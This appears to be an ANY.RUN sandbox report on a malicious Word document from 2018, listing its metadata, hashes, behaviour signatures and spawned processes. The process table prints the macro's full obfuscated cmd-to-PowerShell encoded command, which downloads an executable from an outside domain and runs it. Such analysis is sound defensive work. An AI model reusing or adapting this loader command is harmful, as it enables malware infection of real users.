analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | Sidney_Yarbrough.doc_ |
| Full analysis: | https://app.any.run/tasks/725b93f2-10be-442d-8614-17b73674fd53 |
| Verdict: | Malicious activity |
| Analysis date: | November 14, 2018, 10:30:30 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Exclusive next generation instruction set, Subject: Maine Mark, Author: 1-148-512-6515, Comments: Multi-lateral mission-critical structure, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Fri Nov 9 09:10:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
| MD5: | 9113C68179F1F4BA043C54A7D9D29A01 |
| SHA1: | A26112A3A615BC89508AD04A9B281D41CDF42A09 |
| SHA256: | 8586A5C9008E3502471C9ECF2141F4B2411B89A96DBA6C590D49EF4E2202A935 |
| SSDEEP: | 1536:qs5ztL6rZMLt09RofluVym3VSyuJDU3nxyL482x+t5:pa8A+t+yZ8zjg5 |
MALICIOUS
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 2648)
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 2648)
SUSPICIOUS
Starts Microsoft Office Application
- rundll32.exe (PID: 3556)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2648)
Creates files in the user directory
- WINWORD.EXE (PID: 2648)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | Exclusive next generation instruction set |
|---|---|
| Subject: | Maine Mark |
| Author: | 1-148-512-6515 |
| Keywords: | - |
| Comments: | Multi-lateral mission-critical structure |
| Template: | Normal |
| LastModifiedBy: | Пользователь Windows |
| RevisionNumber: | 10 |
| Software: | Microsoft Office Word |
| TotalEditTime: | 2.0 minutes |
| CreateDate: | 2018:04:19 18:59:00 |
| ModifyDate: | 2018:11:09 09:10:00 |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Security: | None |
| CodePage: | Windows Cyrillic |
| Manager: | Elenora D'Amore |
| Company: | Stoltenberg, O'Conner and Rice Hanna Kertzmann DDS |
| Bytes: | 96256 |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 1 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3556 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_ | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
| 2648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
| 3952 | CMd.eXe /c p@o@W@e@r@S@h@e@l@L@.@e@x@e@ @-@e@c@ @K@A@B@O@A@G@U@A@d@w@A@t@A@E@8@A@Y@g@B@q@A@G@U@A@Y@w@B@0@A@C@A@A@U@w@B@5@A@H@M@A@d@A@B@l@A@G@0@A@L@g@B@O@A@G@U@A@d@A@A@u@A@F@c@A@Z@Q@B@i@A@E@M@A@b@A@B@p@A@G@U@A@b@g@B@0@A@C@k@A@L@g@B@E@A@G@8@A@d@w@B@u@A@G@w@A@b@w@B@h@A@G@Q@A@R@g@B@p@A@G@w@A@Z@Q@A@o@A@C@I@A@a@A@B@0@A@H@Q@A@c@A@A@6@A@C@8@A@L@w@B@j@A@H@k@A@d@A@B@o@A@H@I@A@b@w@B@t@A@G@E@A@d@A@B@0@A@C@4@A@Y@w@B@v@A@G@0@A@L@w@B@X@A@E@U@A@U@w@A@v@A@G@Y@A@Y@Q@B@0@A@G@8@A@Z@w@A@u@A@H@A@A@a@A@B@w@A@D@8@A@b@A@A@9@A@G@U@A@a@Q@B@k@A@G@k@A@N@A@A@u@A@H@g@A@Y@Q@B@w@A@C@I@A@L@A@A@g@A@C@Q@A@Z@Q@B@u@A@H@Y@A@O@g@B@B@A@F@A@A@U@A@B@E@A@E@E@A@V@A@B@B@A@C@A@A@K@w@A@g@A@C@c@A@X@A@A@x@A@D@M@A@M@Q@A@x@A@G@M@A@O@A@A@1@A@G@I@A@L@g@B@l@A@H@g@A@Z@Q@A@n@A@C@k@A@O@w@A@g@A@F@M@A@d@A@B@h@A@H@I@A@d@A@A@t@A@F@A@A@c@g@B@v@A@G@M@A@Z@Q@B@z@A@H@M@A@I@A@A@k@A@G@U@A@b@g@B@2@A@D@o@A@Q@Q@B@Q@A@F@A@A@R@A@B@B@A@F@Q@A@Q@Q@A@n@A@F@w@A@M@Q@A@z@A@D@E@A@M@Q@B@j@A@D@g@A@N@Q@B@i@A@C@4@A@Z@Q@B@4@A@G@U@A@J@w@A@7@A@C@A@A@R@Q@B@4@A@G@k@A@d@A@A@= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
Total events
1 644
Read events
1 242
Write events
0
Delete events
0
Modification events
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDDF7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dney_Yarbrough.doc_ | pgc | |
MD5:C12C34027668605AFBD9EDA0B860E57C | SHA256:75D26FC05651695B7F3E0541FEC613A23E29799034BD54048586060B68DBC763 | |||
| 2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6138494EE04D6A4CE79A0DEF20DD36BE | SHA256:779BB61888F5B173AD0A1EE9015E28554E14054B70F520191C3B6670226647BB | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report